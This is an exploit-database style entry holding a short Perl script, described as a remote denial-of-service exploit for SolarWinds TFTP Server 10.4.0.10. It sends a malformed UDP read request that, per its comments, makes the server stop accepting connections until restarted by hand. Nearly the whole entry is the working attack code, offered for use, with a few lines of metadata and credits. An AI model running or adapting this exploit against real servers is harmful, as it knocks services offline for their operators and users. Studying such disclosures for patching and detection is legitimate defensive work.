# Exploit Title: Solarwinds TFTP DOS# Date: 5-21-2010# Author: Nullthreat# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx# Version: 10.4.0.10# Tested on: Windows XP SP3# Code : #!/usr/bin/perl# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit# by Nullthreat# The application will not crash, but it will stop accepting connections.# You will be forced to restart the server by hand in the config# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k
use IO::Socket;$port = "69";$host = $ARGV[0];$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');$really=
"\x00\x01".# Opcode 1 = Read Request"\x01".# The crash....no really thats it"\x00".# Null byte"NETASCII".# The mode"\x00";# Null byte$s->send($really);